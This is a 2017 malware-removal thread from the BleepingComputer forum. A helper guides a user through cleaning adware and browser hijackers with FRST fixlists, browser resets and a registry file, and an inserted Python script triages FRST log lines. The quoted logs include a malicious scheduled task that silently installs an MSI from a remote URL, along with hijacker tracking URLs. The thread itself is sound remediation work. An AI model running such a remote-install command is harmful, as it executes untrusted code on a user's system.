
Winsap.dll, kubey.exe, Nvather, WinSnare, update_msi and many more..


  • This topic is locked
15 replies to this topic

#1 vish_arya

  • Members
  • 8 posts

Posted 30 March 2017 - 10:26 AM

I have tried every post and forum... related to malware removal... I have tried removing them in safe mode... and kept running scans until Malwarebytes, HitmanPro, AdwCleaner, Windows Defender, etc. stopped detecting even a single threat.
But still these keep coming back after 5-10 days. I have stopped surfing any unknown site just to be sure that I am not redownloading them. I have attached the FRST.txt and Addition.txt logs.

Please help..!!

Attached Files




#2 nasdaq

  • Malware Response Team
  • 40,213 posts
  • Gender:Male
  • Location:Montreal, QC. Canada

Posted 31 March 2017 - 07:35 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can, please print this topic; it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Press the Windows key + R on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and click the OK key.

Please copy the entire contents of the code box below to a new file.
 
Start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:


(Kyubey.exe) C:\Users\vishal\AppData\Roaming\Kyubey\Kyubey.exe
ShellExecuteHooks: No Name - {D0ACBDDC-03A0-11E7-8952-64006A5CFC23} -  -> No File
ShellIconOverlayIdentifiers: [.QMDeskTopGCIcon] -> {B7667919-3765-4815-A66D-98A09BE662D6} =>  -> No File
ShellIconOverlayIdentifiers: [KzShlobj] -> {AAA0C5B8-933F-4200-93AD-B143D7FFF9F2} =>  -> No File
GroupPolicyScripts: Restriction <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
SearchScopes: HKU\S-1-5-21-2110739183-721557999-1904875066-1000 -> {95B7759C-8C7F-4BF1-B163-73684A933233} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
Toolbar: HKLM-x32 - No Name - {A057A204-BACC-4D26-9990-79A187E2698E} -  No File
Toolbar: HKU\S-1-5-21-2110739183-721557999-1904875066-1000 -> No Name - {2B171655-A69C-5C18-B693-6CB5DC269D41} -  No File
FF Plugin: @videolan.org/vlc,version=2.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [No File]
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [No File]
FF Plugin HKU\S-1-5-21-2110739183-721557999-1904875066-1000: @talk.google.com/GoogleTalkPlugin -> C:\Users\vishal\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll [No File]
FF Plugin HKU\S-1-5-21-2110739183-721557999-1904875066-1000: @talk.google.com/O1DPlugin -> C:\Users\vishal\AppData\Roaming\Mozilla\plugins\npo1d.dll [No File]
CHR StartupUrls: Default -> "hxxp://www.google.com/","hxxp://www.sweet-page.com/?type=hp&ts=1409729830&from=cor&uid=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX"
CHR Extension: (Poppit!) - C:\Users\vishal\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcbkbpnkkkipelfledbfocopglifcfmi [2017-03-21]
CHR Extension: (Chrome Web Store Payments) - C:\Users\vishal\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-21]
CHR Extension: (Chrome Media Router) - C:\Users\vishal\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-03-21]
R2 Kyubey; C:\Users\vishal\AppData\Roaming\Kyubey\Kyubey.exe [243200 2017-03-30] (Kyubey.exe) [File not signed]
R2 WinSAPSvc; C:\Users\vishal\AppData\Roaming\WinSAPSvc\WinSAP.dll [218624 2017-03-30] (Windows) [File not signed]
R2 WINSNARE; C:\Users\vishal\AppData\Roaming\WINSNARE\WinSnare.dll [1293312 2017-03-30] (InterSect Alliance Pty Ltd) [File not signed] <==== ATTENTION
U3 idsvc; no ImagePath
Task: {17DDD741-E70C-445F-9F61-AFE4F1895962} - \Microsoft\Windows\Media Center\RegisterObject -> No File <==== ATTENTION
Task: {20D4BECB-5581-454C-A0F8-D4160A166C70} - \Clamechshzuward -> No File <==== ATTENTION
Task: {2E9829BB-A344-4B23-AE3F-E159DCF5F2C6} - System32\Tasks\Gretition Server => C:\Program Files (x86)\Nvather\xderlther.exe
Task: {35B9E1DE-3C40-4EDA-9CBA-5480E5B6F70A} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {3FB56423-05B0-4B6B-8D8C-7CB6BC6EC186} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {59D3D09F-E1C7-4EB9-A7F1-61643F3F6663} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-03-30] ()
Task: {5EBA5001-3FE5-48C8-8E60-267EDC5669A5} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {63F7D7F8-2720-4845-9E04-C886B74C4C2E} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS.exe
Task: {6EB097C8-2A64-48D9-9E36-7765E47D0E66} - System32\Tasks\Pharitain => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX&v=20170316 /q <==== ATTENTION
Task: {709F843C-FCF1-4737-8354-5DFBFB438783} - \{17B7CF41-5126-4A15-B862-E4B765D331EA} -> No File <==== ATTENTION
Task: {72145681-2981-4A38-B60E-5C270D935113} - \OneDrive Standalone Update Task v2 -> No File <==== ATTENTION
Task: {79E08111-1A9B-4EB0-9E6C-4E5E3405E9EC} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {8C2F4FC6-DA70-47D1-BF30-35554E8ABB41} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {980C72E0-89B3-44EF-8597-AFF297A8C1E2} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {B5123FFB-B907-4B61-9597-026F9A72199D} - System32\Tasks\Pigmecif => C:\PROGRA~1\GROOVE~1\Gagzhv.bat  <==== ATTENTION
Task: {E20AF786-F18D-40F2-8F30-19DF10DB6969} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> No File <==== ATTENTION
Task: {F14C4AA8-BF57-4520-AD34-48F31B3338CC} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {F2CBA233-F527-4140-B0EA-1D297624A59A} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {F3144176-29A4-423F-8E18-972F045EC70E} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {FC211629-91FB-4698-BFC0-B64837102FB0} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {FE028124-A927-48E9-BB69-AD424EA1FF8D} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`26hfm [0]
C:\Program Files (x86)\Nvather
C:\Program Files (x86)\MIO
C:\Windows\AutoKMS.exe
C:\PROGRA~1\GROOVE~1
C:\Users\vishal\AppData\Roaming\Kyubey
C:\Users\vishal\AppData\Roaming\WinSAPSvc
C:\Users\vishal\AppData\Roaming\WINSNARE

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt); please post it in your reply.

===

Reset Chrome...
Open Google Chrome and click on the menu icon, which is located at the top right of Google Chrome.
 
Click "Settings" then "Show advanced settings" at the bottom of the screen.
 
Click "Reset browser settings" button.
 
Restart Chrome.
===

ADOBE SHOCKWAVE

Navigate to this page and follow the instructions and get the latest version.
https://www.adobe.com/shockwave/welcome/

=====

ADOBE AIR

Navigate to this page and follow the instructions and get the latest version.
https://get.adobe.com/air/

==============

Your version of Java is also outdated and needs to be updated to take advantage of fixes that have eliminated security vulnerabilities.

You can manually check your present version and update as recommended.
https://www.java.com/en/download/installed.jsp

Be careful not to install malware posing as a Java update!
Important: read this blog.
http://blog.trendmicro.com/trendlabs-security-intelligence/malware-poses-as-an-update-for-java-0-day-fix/

Quoted from the page.
"In light of the recent events surrounding Java, users must seriously consider their use of Java. Do they really need it? If yes, make sure that users follow the steps we recommended and get the security update directly from the official oracle website." at:
http://www.oracle.com/technetwork/java/javase/downloads/index.html

How to disable Java in your browsers
http://www.infoworld.com/t/web-browsers/how-disable-java-in-your-browsers-210882

If still present after these updates, remove these old version(s) via the Control Panel > Programs > Programs and Features.
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 14.0.0.178 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.1 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.1.7.157 - Adobe Systems, Inc.)
Java 7 Update 21 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86417021FF}) (Version: 7.0.210 - Oracle)
Java 7 Update 45 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217021FF}) (Version: 7.0.450 - Oracle)

Please post the fixlog.txt and let me know what problem persists with this computer.
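The fixlist above was built by reading FRST output by eye: the tool's own "<==== ATTENTION" marker, unsigned binaries started from AppData, a scheduled task that installs an MSI straight from a URL, and entries whose target file no longer exists. The script below is an added example (not code from this thread and not part of the FRST project) that applies those same clues mechanically to FRST-style lines. The first six sample lines are copied from the log excerpts in this thread; the "Schedule" service line is a constructed benign control. The scoring rules and the `USER_WRITABLE` / `MSI_FROM_URL` patterns are my own assumptions about what is worth a second look, not anything FRST itself defines.

```python
"""Heuristic triage of FRST (Farbar Recovery Scan Tool) log lines.

Added example: not code from the BleepingComputer thread and not part of
the FRST project. It scores each line with the clues a helper uses when
drafting a fixlist: FRST's '<==== ATTENTION' marker, unsigned binaries in
user-writable locations, scheduled tasks that pull an MSI from a URL, and
dead entries whose target is gone.
"""
import re
from dataclasses import dataclass, field

# Sample input. Lines 1-6 are copied from the thread's own log excerpts;
# the last line is a CONSTRUCTED benign Microsoft service used as a control
# so the triage has something it should leave alone.
SAMPLE_LOG = r"""
R2 Kyubey; C:\Users\vishal\AppData\Roaming\Kyubey\Kyubey.exe [243200 2017-03-30] (Kyubey.exe) [File not signed]
R2 WINSNARE; C:\Users\vishal\AppData\Roaming\WINSNARE\WinSnare.dll [1293312 2017-03-30] (InterSect Alliance Pty Ltd) [File not signed] <==== ATTENTION
Task: {6EB097C8-2A64-48D9-9E36-7765E47D0E66} - System32\Tasks\Pharitain => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX&v=20170316 /q <==== ATTENTION
Task: {72145681-2981-4A38-B60E-5C270D935113} - \OneDrive Standalone Update Task v2 -> No File <==== ATTENTION
Task: {63F7D7F8-2720-4845-9E04-C886B74C4C2E} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS.exe
S2 HotcineSU; "C:\Users\vishal\AppData\Local\Temp\1\ttff.exe" /i [X] <==== ATTENTION
R2 Schedule; C:\Windows\System32\schedsvc.dll [1234567 2016-07-16] (Microsoft Corporation)
"""

# Assumed heuristics (mine, not FRST's). Paths a normal user can write to
# are where droppers usually park themselves; FRST defangs http as hxxp.
USER_WRITABLE = re.compile(r"\\(AppData|ProgramData|Users\\Public|Temp)\\", re.I)
MSI_FROM_URL = re.compile(r"\bmsiexec\b.*\bh(?:xx|tt)ps?://", re.I)


@dataclass
class Finding:
    line: str
    reasons: list = field(default_factory=list)

    @property
    def score(self) -> int:
        return len(self.reasons)


def triage_line(line: str) -> Finding:
    """Attach zero or more reasons to one FRST line."""
    f = Finding(line)
    if "<==== ATTENTION" in line:
        f.reasons.append("flagged by FRST")
    if "[File not signed]" in line and USER_WRITABLE.search(line):
        f.reasons.append("unsigned binary in a user-writable path")
    if line.startswith("Task:") and MSI_FROM_URL.search(line):
        f.reasons.append("scheduled task installs an MSI from a URL")
    if "-> No File" in line or " [X]" in line:
        f.reasons.append("dead entry, target missing")
    return f


def triage(log: str) -> list:
    """Return only the lines that earned a reason, highest score first.
    sorted() is stable, so ties keep the log's original order."""
    findings = [triage_line(ln.strip()) for ln in log.splitlines() if ln.strip()]
    return sorted((f for f in findings if f.reasons), key=lambda f: -f.score)


def build_fixlist(findings, min_score: int = 1) -> str:
    """Draft a fixlist.txt in the layout used in this thread: the safety
    directives first, then the flagged lines verbatim, then End."""
    body = [f.line for f in findings if f.score >= min_score]
    parts = ["Start", "", "CreateRestorePoint:", "EmptyTemp:", "CloseProcesses:", ""]
    parts += body + ["", "End"]
    return "\n".join(parts) + "\n"


if __name__ == "__main__":
    hits = triage(SAMPLE_LOG)
    for h in hits:
        print(f"[{h.score}] {h.line}\n      " + "; ".join(h.reasons))
    print(build_fixlist(hits))
```

Note what the heuristics miss: the AutoKMS task scores zero because it lives under C:\Windows and carries no signature note, yet the helper removed it. Mechanical triage produces a draft to be reviewed by someone who knows the entries; the draft still begins with CreateRestorePoint: for the same reason the fixes in this thread do.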

#3 vish_arya

  • Topic Starter
  • Members
  • 8 posts

Posted 31 March 2017 - 10:38 AM

Hello, nasdaq

Thank you for taking the time for me.

1) I have uninstalled Java and updated the Adobe applications (Shockwave, AIR and Flash Player).

2) I ran FRST and clicked FIX (fixlog.txt attached). But when I restarted I found new developments:

   i)  Mozilla Firefox is installed on my PC (I've never used Mozilla before), but it is not showing in the Programs and Features list in Control Panel.
   ii) Chrome shortcut address changed to "C:\Program Files (x86)\Hotcine\Application\chrome.exe"

3) I found "deskapp" and "winsnare" installed in my programs.

I have attached new addition2.txt and FRST2.txt for reference, and also some snaps to show the above cases. I am not making any changes (update or uninstall) to any program except under your guidance.

Thank you.

Attached Files



#4 nasdaq

  • Malware Response Team
  • 40,213 posts
  • Gender:Male
  • Location:Montreal, QC. Canada

Posted 31 March 2017 - 01:28 PM

Remove these programs in bold via the Control Panel > Programs > Programs and Features.
deskapp (HKLM-x32\...\{6AD06984-E21B-436F-9341-11053320B994}) (Version: 1.1.4 - deskapp)
WinSnare (HKLM-x32\...\{3E2BA91E-4812-478B-B594-9876A8081CCD}) (Version: 4.4.3 - WinSnare) <==== ATTENTION


Press the Windows key + R on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and click the OK key.

Please copy the entire contents of the code box below to a new file.
 
Start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

Shortcut: C:\Users\vishal\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Hotcine\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\vishal\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Hotcine\Application\chrome.exe (Google Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Hotcine\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Hotcine\Application\chrome.exe (Google Inc.)
ShortcutWithArgument: C:\Users\vishal\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.startpageing123.com/?type=sc&ts=1490943768&z=264dae949b366dc354a820fg1zet8eet2z6cam5m8m&from=che0812&uid=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX
ShortcutWithArgument: C:\Users\vishal\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.startpageing123.com/?type=sc&ts=1490943768&z=264dae949b366dc354a820fg1zet8eet2z6cam5m8m&from=che0812&uid=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX
2017-03-31 13:18 - 2017-03-31 08:40 - 00102400 _____ () C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{4A23F716-C9CC-4F16-B930-B68D8C9207C1}] => (Allow) C:\Program Files (x86)\Hotcine\Application\chrome.exe
FirewallRules: [{883F4D91-2E93-401A-8652-E7A1721A4862}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{71F5DB00-345F-4A53-9F32-6BC1CA0E9A43}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
(Google Inc.) C:\Program Files (x86)\Hotcine\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Hotcine\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Hotcine\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Hotcine\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Hotcine\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Hotcine\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Hotcine\Application\chrome.exe
() C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
(Google Inc.) C:\Program Files (x86)\Hotcine\Application\chrome.exe
HKU\S-1-5-21-2110739183-721557999-1904875066-1000\...\ChromeHTML: -> C:\Program Files (x86)\Hotcine\Application\chrome.exe (Google Inc.) <==== ATTENTION	
HKU\S-1-5-21-2110739183-721557999-1904875066-1000\...\Run: [GoogleChromeAutoLaunch_0E5E511B9C6F336105C90703B55E87DE] => C:\Program Files (x86)\Hotcine\Application\chrome.exe [941912 2017-03-09] (Google Inc.)
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.startpageing123.com/?type=hp&ts=1490943768&z=264dae949b366dc354a820fg1zet8eet2z6cam5m8m&from=che0812&uid=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.startpageing123.com/?type=hp&ts=1490943768&z=264dae949b366dc354a820fg1zet8eet2z6cam5m8m&from=che0812&uid=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.startpageing123.com/search/?type=ds&ts=1490943768&z=264dae949b366dc354a820fg1zet8eet2z6cam5m8m&from=che0812&uid=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.startpageing123.com/search/?type=ds&ts=1490943768&z=264dae949b366dc354a820fg1zet8eet2z6cam5m8m&from=che0812&uid=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.startpageing123.com/?type=hp&ts=1490943768&z=264dae949b366dc354a820fg1zet8eet2z6cam5m8m&from=che0812&uid=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.startpageing123.com/?type=hp&ts=1490943768&z=264dae949b366dc354a820fg1zet8eet2z6cam5m8m&from=che0812&uid=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1490943768&z=264dae949b366dc354a820fg1zet8eet2z6cam5m8m&from=che0812&uid=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1490943768&z=264dae949b366dc354a820fg1zet8eet2z6cam5m8m&from=che0812&uid=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX&q={searchTerms}
HKU\S-1-5-21-2110739183-721557999-1904875066-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.startpageing123.com/?type=hp&ts=1490943768&z=264dae949b366dc354a820fg1zet8eet2z6cam5m8m&from=che0812&uid=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX
HKU\S-1-5-21-2110739183-721557999-1904875066-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.startpageing123.com/?type=hp&ts=1490943768&z=264dae949b366dc354a820fg1zet8eet2z6cam5m8m&from=che0812&uid=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX
SearchScopes: HKU\S-1-5-21-2110739183-721557999-1904875066-1000 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1490943768&z=264dae949b366dc354a820fg1zet8eet2z6cam5m8m&from=che0812&uid=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2110739183-721557999-1904875066-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1490943768&z=264dae949b366dc354a820fg1zet8eet2z6cam5m8m&from=che0812&uid=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX&q={searchTerms}
Edge HomeButtonPage: HKU\S-1-5-21-2110739183-721557999-1904875066-1000 -> hxxp://www.startpageing123.com/?type=hp&ts=1490943768&z=264dae949b366dc354a820fg1zet8eet2z6cam5m8m&from=che0812&uid=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX
FF Extension: (FF Adr) - C:\Users\vishal\AppData\Roaming\Firefox\Firefox\Profiles\ns75nsgk.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-03-31] [not signed]
FF SearchPlugin: C:\Users\vishal\AppData\Roaming\Firefox\Firefox\Profiles\ns75nsgk.default\searchplugins\startsearch.xml [2017-03-31]
StartMenuInternet: Google Chrome - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe hxxp://www.startpageing123.com/?type=sc&ts=1490943768&z=264dae949b366dc354a820fg1zet8eet2z6cam5m8m&from=che0812&uid=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX
HKU\S-1-5-21-2110739183-721557999-1904875066-1000\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Hotcine\Application\chrome.exe (Google Inc.) <==== ATTENTION
R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [102400 2017-03-31] () [File not signed]
S2 HotcineSU; "C:\Users\vishal\AppData\Local\Temp\1\ttff.exe" /i [X] <==== ATTENTION
C:\Program Files (x86)\Hotcine
C:\Program Files (x86)\Firefox\bin
C:\Users\vishal\AppData\Local\Temp\1
C:\Users\vishal\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk
C:\Users\vishal\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk
C:\Program Files (x86)\deskapp
C:\Program Files (x86)\WinSnare(4.4.3)

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt); please post it in your reply.
===

Looks like your Chrome was compromised.

Remove Chrome using the instructions on this page.
https://support.google.com/chrome/answer/95319?hl=en

Clear your Chrome cache and cookies
https://support.google.com/chromebook/answer/183083?hl=en

Before you do, export your bookmarks.
Chrome will export your bookmarks as an HTML file, which you can then import into another browser.

Re-install Chrome and the Bookmarks.

Use this Chrome page.
https://support.google.com/chrome/answer/95346?co=GENIE.Platform%3DDesktop&hl=en
===

Firefox:
Reset Default Browsing settings:
https://support.mozilla.org/en-US/kb/reset-firefox-easily-fix-problems?utm_expid=65912487-41.djHNRQY0RhaLvvtvcd0BQA.2&utm_referrer=https%3A%2F%2Fwww.google.ca%2F

Clean the Firefox Cache.
https://kb.iu.edu/d/ahic#firefox
<<<>>>

Reset Internet Explorer:
Menu > Tools > Internet Options > Advanced Tab.
Click the Reset button on the bottom of the pane.
Click the Apply button.
Close IE.
===

Let's see what we can find in the Registry.

Farbar Recovery Scan Tool (FRST) - Registry Search
Follow the instructions below to download and execute a Registry search on your system with FRST, and provide the log in your next reply.
  • Right-click on the executable and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Accept the disclaimer by clicking on Yes, and FRST will then do a back-up of your Registry which should take a few seconds;
  • In the Search text area, copy and paste the following:
V2OND97EM5;W3JCL7RP16;JS4NDH930P;76GOS11SE2
  • Once done, click on the Search Registry button and wait for FRST to finish the search;
  • On completion, a log will open in Notepad. Copy and paste its content in your next reply;
Please let me know what problem persists with this computer.

#5 vish_arya

  • Topic Starter
  • Members
  • 8 posts

Posted 31 March 2017 - 05:19 PM

Hello, Nasdaq
 

I have followed all the instructions as you said.
I am attaching the result files, but I have a general query: I can still find the folders with the virus names (ex. C:\Users\vishal\AppData\Local\Hotcine) (pic attached).
Are these OK, or should I run a scan or something to remove these?

Attached Files



#6 nasdaq

  • Malware Response Team
  • 40,213 posts
  • Gender:Male
  • Location:Montreal, QC. Canada

Posted 01 April 2017 - 07:20 AM

Yes, you can delete that Hotcine folder in your App Data\Local folder.
===

Press the Windows key + R on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and click the OK key.
Please copy the entire contents of the code box below to a new file.
 
start


CreateRestorePoint:
EmptyTemp:
CloseProcesses:

HKLM\...\Policies\Explorer: [NoActiveDesktop] 1 [0 2017-03-31] ()
HKLM\...\Policies\Explorer: [NoActiveDesktopChanges] 1 [0 2017-03-31] ()
CHR StartupUrls: Default -> "hxxp://www.google.com/","hxxp://www.sweet-page.com/?type=hp&ts=1409729830&from=cor&uid=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX","hxxp://www.startpageing123.com/?type=hp&ts=1490943768&z=264dae949b366dc354a820fg1zet8eet2z6cam5m8m&from=che0812&uid=HitachiXHTS547550A9E384_J2150050D2HPZDD2HPZDX"

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt); please post it in your reply.
===

Copy the text IN THE QUOTE BOX below to Notepad. Save it as fixme.reg to your desktop.
Be sure the "Save as" type is set to "all files". Once you have saved it, right-click the .reg file and allow it to merge with the registry.
 

Windows Registry Editor Version 5.00

[HKEY_USERS\S-1-5-21-2110739183-721557999-1904875066-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run]
"V2OND97EM5"=-
"W3JCL7RP16"=-
"JS4NDH930P"=-
"76GOS11SE2"=-


Restart the computer when completed.

You can delete the fixme.reg file when done.
===

How is the computer running now?

No need to submit new FRST and Addition.txt logs unless you still have issues.

#7 vish_arya

  • Topic Starter
  • Members
  • 8 posts

Posted 01 April 2017 - 08:52 AM

Thank you for helping me out. 

1) I am now searching for all the leftover folders by the names (as many as I can remember) of viruses in "C:\Users\vishal\AppData\"

2) After that I'm gonna use a scan of Malwarebytes and then HitmanPro. (I'll let you know if I find anything)

   a) Threat detected in "C:\FRST\Quarantine\C\Program Files (x86)\Nvather". There are many .exe files present there. Are they fine or should I remove them? Many other folders are present there with virus names and have .exe files.

I can't see any virus signs manually. That's a big help. But they have a bad record of coming back after 4-5 days even if I don't use the internet at all. So I would like to put a trial window of 5 days before confirming that it's gone.

Either way thanks a lot. :)

Attached Files


Edited by vish_arya, 01 April 2017 - 09:06 AM.


#8 nasdaq

  • Malware Response Team
  • 40,213 posts
  • Gender:Male
  • Location:Montreal, QC. Canada

Posted 01 April 2017 - 01:05 PM



a) Threat detected in "C:\FRST\Quarantine\C\Program Files (x86)\Nvather". There are many .exe files present there. Are they fine or should I remove them? Many other folders are present there with virus names and have .exe files.


Nothing to worry about. These are the files removed by my fix. They are in the FRST\Quarantine folder which can be cleaned when all is well.

===

If all is well.

To learn more about how to protect yourself while on the internet, read this little guide on best security practices to keep safe.
http://www.bleepingcomputer.com/forums/t/407147/answers-to-common-security-questions-best-practices/


https://www.bleepingcomputer.com/tutorials/keep-your-computer-safe-online/
Simple and easy ways to keep your computer safe and secure on the Internet.
===

I close my topic in 6 days. Return if you need.

#9 vish_arya

  • Topic Starter
  • Members
  • 8 posts

Posted 05 April 2017 - 05:58 PM

Hello Nasdaq,
 

When I scanned my PC after your fix, Adware.Elex was detected by Malwarebytes. I removed it at that time and no threats were detected for the last few days. Today I ran a normal scan and I found sweet-page.com and Adware.Elex as threats. Surprisingly, only Malwarebytes is detecting Adware.Elex; the rest of the anti-malware software like HitmanPro and anti-adware software like AdwCleaner shows no threat.

I am attaching FRST.txt and Addition.txt and also 2 pics to show the scan results.
PS: I have removed the sweet-page.com virus using AdwCleaner and thereafter it's not detected again, but I haven't touched Adware.Elex as it keeps coming back no matter how many times I remove it.

Kindly guide me further. Thank you.
 

Attached Files

  • Attached File  4.JPG   79.59KB   0 downloads
  • Attached File  5.JPG   77.6KB   0 downloads
  • Attached File  Addition.txt   38.02KB   1 downloads
  • Attached File  FRST.txt   137.06KB   1 downloads


#10 nasdaq

  • Malware Response Team
  • 40,213 posts
  • Gender:Male
  • Location:Montreal, QC. Canada

Posted 06 April 2017 - 07:02 AM

Can you post the MBAM log?

I would like to see the complete registry keys where these are parked.

I suspect that we are dealing with some dead registry keys.

If that is the case I can provide a fix for it.

